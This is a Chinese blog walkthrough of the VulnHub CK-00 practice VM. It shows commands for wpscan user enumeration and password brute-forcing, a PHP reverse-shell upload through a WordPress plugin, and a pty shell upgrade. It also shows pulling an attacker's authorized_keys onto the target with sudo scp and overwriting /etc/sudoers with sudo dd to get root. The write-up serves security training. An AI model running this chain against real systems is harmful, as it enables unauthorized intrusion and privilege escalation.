CK-00靶机详解

最新推荐文章于 2024-04-21 16:25:54 发布
最新推荐文章于 2024-04-21 16:25:54 发布
阅读量553 收藏
点赞数
分类专栏: 打靶机系列 文章标签: linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131997105
版权

CK-00靶机详解

靶场下载地址:https://download.vulnhub.com/ck/CK-00.zip

这个靶场扫描到ip打开后发现主页面css是有问题的,一般这种情况就是没有配置域名解析。

我们网站主页右击查看源代码,发现一个域名。

image-20230725205856051

把域名添加到我们hosts文件中。

image-20230725205950458

目录扫描时候发现这是一个wordpress的网站,两个登陆页面,都是一样的。

image-20230725205830886

wpscan可以扫描出wordpress的登陆用户名。

wpscan --url http://ck --enumerate u

image-20230725210142587

这时候我们扫出来一个用户名叫做admin

image-20230725210158051

然后根据这个用户名爆破一下。

wpscan --url http://ck -U admin -P /usr/share/wordlists/rockyou.txt

image-20230725210321398

大概两分钟密码就出来了,账号密码都是admin

image-20230725210551676

我们登陆上wordpress的后台,这个位置是一个插件,这里可以上传php文件,我们可以上传一个反弹shell。

image-20230725211702587

image-20230725211721246

这个目录通常是wordpress上传上来文件的位置。

image-20230725211531575

打开一下我们的反弹shell文件。

image-20230725211758654

kali中监听一下,这边就拿到了一个web shell。

利用python3拿到一个稳定的shell。

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20230725211916041

通常wordress都有一个配置文件,里面有数据库的账号密码。

image-20230725212801749

在这里面找到一个账号密码,这个密码不是root用户的密码

image-20230725212850922

但是发现这个密码能进去bla用户。

bla_is_my_password

image-20230725214653741

sudo -l发现这个用户可以以bla1用户的身份执行scp命令。

image-20230725214822551

这里我们看一下,在bla1目录下是没有.ssh文件的,当我们用scp命令拷贝我们kali中的一个文件时候,它会先私钥验证看看能不能拷贝,所以就在这里面自动创建了一个.ssh目录。

我们可以把我们kali的authorized_keys文件拷贝到靶机的这个.ssh中去就可以免密登陆这个用户了。

image-20230725215328064

这里我们拷贝到这个新出现的.ssh目录中去。

sudo -u bla1 /usr/bin/scp root@192.168.102.129:/root/.ssh/authorized_keys .ssh/

image-20230725221244148

然后用我们kali的私钥就可以登陆bla1用户了

image-20230725221310028

sudo -l后发现bla1用户可以免密执行ck-00用户的rbash.

这里我们就可以拿到ck-00用户的rbash了。

image-20230725221416628

拿到ck-00的rbash后sudo -l发现可以免密以root权限执行dd命令。

image-20230725222051890

dd命令可以往一个文件中写东西,以覆盖的方式。

这时候我们直接给bla用户所有的权限,写到sudoers文件中,bla用户就有全部的权限了,可以直接提权。

echo "bla  ALL=(ALL:ALL) NOPASSWD:ALL"|sudo dd of=/etc/sudoers

image-20230725222117743

我们登陆上bla用户直接提权发现拿到了root权限。

image-20230725222145786

dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5742
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
【靶场系列】01 ATT&CK红队评估
最新发布
qq_41169485的博客
04-21 1515
为web服务器,应设置为双网卡主机,其中NAT网卡与攻击机相连,VMnet1网卡与其他两台靶机相连 (图中设置错误,应设置网络适配器1为VMnet1)发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为。为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe。VMnet1网卡为仅主机模式,设置IP段为192.168.52.0,确保三台主机均可以相互ping通。
【网络安全】Kali中常用打靶工具及命令(随时补充)
fly_enum的博客
12-01 599
Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload。
Windows系统——ATT&CK靶场(一)——MSF方式
qq_44029310的博客
06-26 2119
本文涉及知识点有:环境搭建,nmap使用,mysql日志文件写 shell,yxcms历史漏洞,进程迁移,提权,kiwi模块使用,3389相关,配置路由和代理,横向移动,msf相关使用等。
Vulnhub靶机CK-00渗透
xingjinhao123的博客
03-03 327
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/ck-00,444/ 难度是容易的,建议使用VirtualBox运行靶机 运行环境 靶机:网络设为桥接,IP地址:192.168.1.90 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 将靶机运行起来 靶机运行界面就已经告诉了IP地址,接下来就是扫描端口了 这里看到22端口是ssh服务,密钥的加密方式是rsa 80端口的架构是wordpress 使用wpscan对wordpress
记录靶机渗透中用到的提权方法
Yaphst的博客
03-15 5575
1、find提权 (1)首先使用如下命令查看具有suid 权限的可执行二进制程序 find / -perm -4000 -type f 2>/dev/null 或 find / -perm -u=s -type f 2>/dev/null 参数含义参考find基础命令 -perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限 -type:d(目录)f(文件)c(字符设备文件)b(块设备文
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 675
VulnHub-Durian靶机详细渗透过程
hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)
weixin_62621015的博客
03-21 426
hacksudo2 vulnhub靶场(NFS,vbox靶场环境配置)
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5396
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
driftingblues3靶机详解
weixin_44681307的博客
07-10 166
比如说我们想利用cat命令来提权,cat命令的真实目录是/usr/bin/cat,我们可以把/tmp添加进环境变量,在/tmp中创建一个cat文件,这样getinfo这个文件运行的时候就会运行我们这个cat,实则上是我们的提权命令。扫描ip的同时扫描了一下目录,发现扫描出来很多目录,这里我还很窃喜,当我尝试的时候发现很多目录都是个坑,是个恶作剧,只有一个/robots.txt目录是有点用的。在这里面发现一个目录,我们进去后发现又一个新目录,让我们检查这个目录。开启一个服务,把私钥传给我们的靶机
vulnhub靶机实战-My-cmsms靶机
09-29
在本例中,我们使用sudo arp-scan -l命令来扫描局域网中的主机,得到靶机的MAC地址为08:00:27:da:cf:dd。 端口扫描 端口扫描是指通过扫描目标主机的开放端口来获知其开放的服务类型和版本。常见的端口扫描工具有...
sqli-labs-master靶机
10-12
sqli-labs-master。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
W1R3S打靶记录--附nmap详细说明
weixin_58815063的博客
07-12 174
1.nmap获得四个端口21,22,80,3306都是标准的服务端口,但在nmap扫描过程中我们详细的对获得数据进行取舍、利用,在渗透以及实际攻防的过程中,怎么使用,怎么选择。也不要忽略udp、ipv6、对四个端口的优先级排序1.21端口ftp,里面获得了若干的文本文件,逐一查看、破解、处理,虽然此次靶机并没有什么用,但在过程中这是必不可缺的,在若干信息中突围,选择取舍,这才是必要的。2.3306端口mysql,尝试登录为禁止连接状态。
kali常用命令总结
li1136594919的博客
03-21 2745
有时候突然就想不起来kali一些工具的命令,放在这有时间多看几次。个人向,若有错误,请大见谅。
靶机信息收集四部曲之自动bash脚本
li1136594919的博客
04-16 129
后续有考虑对脚本进行拆分,让每个任务单独一个脚本,然后用一个总的shell去执行这些任务脚本,既能压缩时间,提高效率,往后有新的功能加进来时只需要再写一个脚本就行了。平时打靶机时,每次都要进行开放端口扫描,开放端口服务扫描,开放端口漏洞扫描,web目录爆破,我这个人比较懒,想着能不能写个自动脚本,每次只需要输入ip和保存信息的目录就行了,于是花了三四个小时写出这个个人版shell脚本。还有一种情况,那就是80和8080两个端口都开放且都是http服务,这里只扫描了一个端口(有可能一个也扫不到直接报错?
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值